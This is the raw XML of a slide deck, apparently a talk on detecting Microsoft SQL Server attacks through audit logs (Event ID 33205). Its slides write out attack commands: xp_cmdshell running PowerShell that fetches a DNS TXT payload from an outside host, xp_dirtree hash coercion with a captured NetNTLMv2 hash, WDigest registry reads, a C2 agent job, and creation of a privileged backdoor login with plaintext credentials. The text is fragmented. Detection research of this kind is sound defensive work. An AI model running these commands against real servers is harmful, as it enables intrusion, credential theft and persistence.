          </a:p>
          <a:p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 DOMAIN corp1</a:t>
            </a:r>
          </a:p>
          <a:p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exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3286235418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-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dirtree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50A9D-92FF-2C22-52F5-989AC4D4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2" y="2308367"/>
            <a:ext cx="11070335" cy="1725751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0778544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F0B4C7-582B-7B7C-80FE-CA641F54C897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2510860" y="2822986"/>
            <a:ext cx="8181891" cy="2214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Event ID = 33205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Statement contains “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="44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xp_dirtree</a:t>
            </a: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Group by User and Hostname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41F778-BE97-FA8B-AD84-C14E99CD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520" y="524021"/>
            <a:ext cx="3098959" cy="15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7298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3ABBAC7-EA13-D75F-0AF4-8A1862E3F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797" y="273423"/>
            <a:ext cx="5180405" cy="6311153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280368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-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dirtree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59091-B715-145B-CF43-CA819586E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610" y="1178859"/>
            <a:ext cx="6140780" cy="536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9127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-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xp_cmdshell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395633-A8BA-865D-C507-949DA606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091" y="1057835"/>
            <a:ext cx="6788499" cy="5556536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308665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-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xp_cmdshell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330BF-572A-C6E8-B537-28E483F65BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341779" y="2511831"/>
            <a:ext cx="11508441" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E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3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1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powershell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000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$text = Resolve-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000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DnsName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000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hax.seamlessintelligence.com.au</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000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-Type TXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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powershell $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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text.strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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[1]</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill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140159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-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xp_cmdshell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D50004-9AF6-2968-5ACD-FE7BA8B75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9" y="1790355"/>
            <a:ext cx="11241741" cy="3277289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237141788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2327082" y="1653872"/>
            <a:ext cx="7537836" cy="27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8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The Problem</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="138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949833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-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xp_cmdshell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5330BF-572A-C6E8-B537-28E483F65BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684679" y="1795226"/>
            <a:ext cx="1082264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 err="1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sqsh</a:t>
            </a:r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-S 192.168.3.22 -U corp1\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1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tboss</a:t>
            </a:r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-P admin#123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2E8E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master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1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xp_cmdshell</a:t>
            </a:r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'powershell "$text = Resolve-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1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DnsName</a:t>
            </a:r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AU" sz="2800" dirty="0" err="1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hax.seamlessintelligence.com.au</a:t>
            </a:r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-Type TXT; powershell $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1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text.strings</a:t>
            </a:r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[1]“’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2E8E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sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8E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4265206469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-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xp_cmdshell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834DD5-A914-C3A5-FBBC-F1CF3746F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076" y="1236736"/>
            <a:ext cx="9309847" cy="5233871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2371867240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-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xp_cmdshell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9DDBD-4E0B-754C-FFF3-56F4F6B1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64" y="2203365"/>
            <a:ext cx="11640671" cy="1843981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3854061171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F0B4C7-582B-7B7C-80FE-CA641F54C897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2510860" y="2822986"/>
            <a:ext cx="8181891" cy="2214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Event ID = 33205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Statement contains “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="44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xp_cmdshell</a:t>
            </a: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Group by User and Hostname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24480-E77B-5884-2486-9032BB63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418" y="295227"/>
            <a:ext cx="3175163" cy="184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396910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CD3BD7F-686F-F08C-8F3B-40B229AFB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465" y="819393"/>
            <a:ext cx="5079069" cy="521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139139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–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trusted_something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C84D7F-6A0D-0433-6C64-36A32A37C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858" y="1057835"/>
            <a:ext cx="6960283" cy="5661212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248190102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–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trusted_something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9265F-AB5C-12AC-D54B-72B85E37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154" y="963706"/>
            <a:ext cx="7051692" cy="5839200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2084290587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–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trusted_something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3AEDF-74C5-C2A1-25C3-280BA3343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71" y="1770819"/>
            <a:ext cx="11387857" cy="3867982"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8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EFC438-4282-CF18-3D24-EC9654B5245C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753035" y="2339788"/>
            <a:ext cx="5943600" cy="36307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23B0EC-5A85-7DA2-A74F-B123357B796F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753034" y="2707342"/>
            <a:ext cx="7965141" cy="36307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0D28C4-15B1-DC36-3252-79366E8085B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1712257" y="3523274"/>
            <a:ext cx="8005483" cy="36307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0AA05-9D16-01C9-C1CC-87899C6E0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753034" y="4092243"/>
            <a:ext cx="8785413" cy="1497251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94817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84E18C-D2EC-3C21-A2EF-6A9C935B0AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="184568"/>
            <a:ext cx="12192000" cy="873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Database - Stored Procedure – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="40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trusted_something</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="40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631AF-9DCD-D65A-7EBA-F4F8E4B3A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9" y="1773795"/>
            <a:ext cx="11500441" cy="2692538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266444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F0B4C7-582B-7B7C-80FE-CA641F54C897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699247" y="2822986"/>
            <a:ext cx="10851777" cy="2214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Event ID = 33205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Statement contains “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0" err="1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sp_add_trusted_assembly</a:t>
            </a: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.*HTTP ”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Group by User and Hostname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6928FD-9298-6F28-3CE7-1C7BE9F48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593" y="528875"/>
            <a:ext cx="3168813" cy="167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8407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erver with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3EF672D-06DE-C6F3-6F58-1847FC3B6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3975" y="1218115"/>
            <a:ext cx="1791694" cy="1791694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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74B6AE59-AF45-5E17-2FC7-DD368A411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742" y="2204078"/>
            <a:ext cx="1333830" cy="1333830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Artificial Intelligence with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1257E11F-8865-AC14-B29B-0FC51257C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457" y="3353041"/>
            <a:ext cx="914400" cy="9144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D10CA6D3-E94E-5004-C52D-ED169799B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23975" y="3766839"/>
            <a:ext cx="1791694" cy="1724107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21FCBA0-32D4-2210-8490-F9331BD21831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rot="10800000" flipV="1">
            <a:off x="2003573" y="2113961"/>
            <a:ext cx="2220403" cy="757031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5C05F5C-DE55-CA09-6544-9EAFC13A6097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="1"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6015669" y="2113962"/>
            <a:ext cx="1908574" cy="131074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4442C3-B6DC-6E2D-A628-744510DAEA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904846" y="1511980"/>
            <a:ext cx="2099144" cy="46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Attack via Windows Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="16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00B6DD-D306-EB4B-B1D2-C2EA5BA34140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825099" y="1511980"/>
            <a:ext cx="2099144" cy="46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Detections Galore</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="16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E7ADBFF-564D-75C7-23B3-42C07DB2A8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4243" y="2341441"/>
            <a:ext cx="3724709" cy="216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91702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2327082" y="927540"/>
            <a:ext cx="7537836" cy="460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Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struggles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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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There were many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691755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EDB1B30-B74D-4981-DDC8-C1C28F812276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1758904" y="634136"/>
            <a:ext cx="9079425" cy="5150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Exactness of logging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Testing breadth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Log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Difficulty to implement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4090867511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CF4108-3BE4-ABE6-708E-9BC0364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63" y="103574"/>
            <a:ext cx="9966874" cy="6650851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="E2E8E8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1489473774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115BC7-73EC-71AE-C85B-87A730E13BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888487" y="404803"/>
            <a:ext cx="1213422" cy="38136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ysClr val="windowText" lastClr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Compromised Credentials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B20132E7-4C20-822B-653E-6DCA2F56108F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2101909" y="595484"/>
            <a:ext cx="834982" cy="711442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F25810-B788-0CA9-22F1-890A28CDD516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4717903" y="1438892"/>
            <a:ext cx="2425340" cy="57286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name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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master.dbo.sysdatabases</a:t>
            </a:r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AU" sz="9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74F721-0890-F85E-6181-ADAC3B3CE1BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787142" y="1637007"/>
            <a:ext cx="1213422" cy="381362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Compromised Database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E2CB11-BEE2-4257-3E21-4350E5DE1DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197073" y="993070"/>
            <a:ext cx="1213422" cy="381362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MASTER Database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97EA109-CA90-54EB-8EE2-4EE2A76E8335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9196022" y="2089444"/>
            <a:ext cx="1213422" cy="381362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MSDB Database</a:t>
            </a:r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BF4A1EE6-4954-349B-8C6B-0B1E5E7904AE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rot="10800000" flipV="1">
            <a:off x="3851291" y="642042"/>
            <a:ext cx="1491944" cy="664883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01C3CEF9-E378-64AF-A9D5-5CC3F1690585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7143243" y="1725325"/>
            <a:ext cx="12700" cy="646969"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000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Database with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8259F611-10EA-5468-7ACB-BDD1A516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235" y="184843"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Server with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F33A7BC-D20C-B2CF-620D-733C7962C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36891" y="849726"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Graphic 12" descr="Database with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6BAE251-69E5-8F13-1D0C-611ED3D04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5533" y="1308313"/>
            <a:ext cx="914400" cy="91440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C10097-7E42-F49F-B5F8-76918074669F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856857" y="700298"/>
            <a:ext cx="1213422" cy="789862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sqsl</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1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AU" sz="1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PowerUpSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000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053A7A-2509-EF2C-23D9-31DE11BA1D6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724380" y="2086871"/>
            <a:ext cx="2418863" cy="5708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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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master.sys.xp_regread</a:t>
            </a:r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Wdigest</a:t>
            </a:r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en-GB" sz="9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UseLogonCredential</a:t>
            </a:r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endParaRPr lang="en-AU" sz="9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02F051C-79F7-F312-9083-1AF3DE76522B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4717903" y="2732829"/>
            <a:ext cx="2418863" cy="5708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master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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xp_cmdshell</a:t>
            </a:r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'whoami'</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="9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5087C5C-2912-082B-A766-A0E2A1A6A5D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7136766" y="2372294"/>
            <a:ext cx="6477" cy="645958"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3629412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78DA5BE-1AA3-E09F-62D7-30D0006FCE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4730730" y="3378787"/>
            <a:ext cx="2418863" cy="5708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Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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SQLAuditWeakLoginPw</a:t>
            </a:r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-Verbose -Instance "192.168.3.22,1433"</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="9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CB2BBBE5-8269-A230-D4EE-046FFCF203EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="3"/>
            <a:endCxn id="16" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7136766" y="3018252"/>
            <a:ext cx="12827" cy="645958"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1782178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467F0CE-8E40-31B6-E2BD-B8008D0FC0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698641" y="2536936"/>
            <a:ext cx="2418863" cy="5708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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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SQLAgentJob</a:t>
            </a:r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-Verbose -Instance "192.168.3.22,1433"</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="9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CF1AF17B-651E-7188-AF8C-D1F2FD601F00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="18" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7149593" y="1765512"/>
            <a:ext cx="2195940" cy="1898697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7474E9C-0AEB-9823-E42A-0087C4F459F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675024" y="5294085"/>
            <a:ext cx="2418863" cy="5708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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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master.dbo.xp_dirtree</a:t>
            </a:r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'\\10.1.1.60\any\thing'</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="9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Graphic 22" descr="Laptop with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47802C56-DD52-C0A5-154B-ED060FC03D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15379" y="3521761"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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FF3D7F9-A497-099A-145D-F719CDFBAF13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="3"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629779" y="3978961"/>
            <a:ext cx="2045245" cy="1600547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3E9126E-63B9-D85B-81DC-7FEAE9C4B801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2564477" y="4848443"/>
            <a:ext cx="1213422" cy="1600546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4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V022-TEST$::CORP1:729d56e9fed021f5:174AB1862BA43AE45E6211AF7E924B67:01010000000000000098EADFB97BD90144BBBE004A6C2F760000000002000800510055004100410001001E00570049004E002D004E004C004900350036005A004D00470049004900340004003400570049004E002D004E004C004900350036005A004D0047004900490034002E0051005500410041002E004C004F00430041004C000300140051005500410041002E004C004F00430041004C000500140051005500410041002E004C004F00430041004C00070008000098EADFB97BD90106000400020000000800300030000000000000000000000000400000FCB49221DF02D73B1E1F116E75343185B0222585F998887ADF2A3746DECFF3850A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0031002E0031002E00360030000000000000000000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CA3E046-3C8E-66AC-8DDA-0F1B0E834F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698640" y="3251937"/>
            <a:ext cx="2418863" cy="71225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Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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SQLOSCmdAgentJob</a:t>
            </a:r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-Verbose -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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SubSystem</a:t>
            </a:r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9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CmdExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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-Command “c2" -Instance "192.168.3.22,1433"</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="9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0A819D8-F0A0-0417-E4A3-94A5A8201073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4749780" y="6058856"/>
            <a:ext cx="2418863" cy="5708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 LOGIN hacker WITH PASSWORD = 'P@ssword123!'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8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sp_addsrvrolemember</a:t>
            </a:r>
            <a:r>
